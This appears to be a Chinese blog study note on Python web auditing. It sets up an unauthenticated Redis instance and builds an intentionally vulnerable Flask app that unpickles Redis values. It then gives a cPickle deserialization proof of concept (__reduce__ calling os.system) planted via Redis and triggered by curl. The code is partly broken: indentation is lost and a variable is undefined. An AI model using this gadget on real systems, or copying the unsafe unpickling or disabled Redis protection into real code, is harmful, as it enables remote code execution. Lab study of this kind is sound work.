Python web审计–实例小结

  • by

一.python 代码审计总览
二.搭建redis未授权
三.python cPickle反序列化漏洞
四.redis+cPickle反序列化漏洞利用

一.python 代码审计总览

参考:https://github.com/bit4woo/python_sec(总结的网站很到位)

二. 搭建redis未授权

https://www.huangdc.com/443
https://www.freebuf.com/vuls/162035.html

允许外链,关闭保护

注释#bind 127.0.0.1 ::1 (条件限制,个人并未在外机测试)
protected-mode no

三.python cPickle反序列化漏洞

参考:https://blog.csdn.net/SKI_12/article/details/85015803

#!/usr/bin/env python
#
import cPickle
import os
import redis

class exp(object):
    def __reduce__(self):
        s = """ls /"""
        return (os.system, (s,))

e = exp()
s = cPickle.dumps(e)
cPickle.loads(s)

四.redis+cPickle反序列化漏洞利用

参考:https://www.leavesongs.com/PENETRATION/zhangyue-python-web-code-execute.html

一个简单服务搭建:

from flask import Flask
from flask import request
import cPickle
import os
import redis

app = Flask(__name__)

@app.route('/')
def hello_world():
#
redis_key=request.args.get("key")
print(redis_key)
s = cPickle.dumps(redis_key)
print(s)
r = redis.Redis(host='127.0.0.1', port=6379, db=0)
r.set(redis_key, s)
@app.route('/test')
def hello_world2():
#
redis_key=request.args.get("key_test")
#print(key_test)
r = redis.Redis(host='127.0.0.1', port=6379, db=0)
result=r.get(key_test)
s=cPickle.loads(result)
print(s)

if __name__ == '__main__':
app.run()

poc:请求存入数据

#!/usr/bin/env python
#
import cPickle
import os
import redis

class exp(object):
def __reduce__(self):
s = """ls -la"""
return (os.system, (s,))

e = exp()
s = cPickle.dumps(e)

r = redis.Redis(host='127.0.0.1', port=6379, db=0)
r.set("key_test2", s)

curl请求,反序列化成功

curl -v http://127.0.0.1:5000/test?key_test=key_test1

查看服务端,已经执行ls -la

2019.9.15

发表评论

电子邮件地址不会被公开。 必填项已用*标注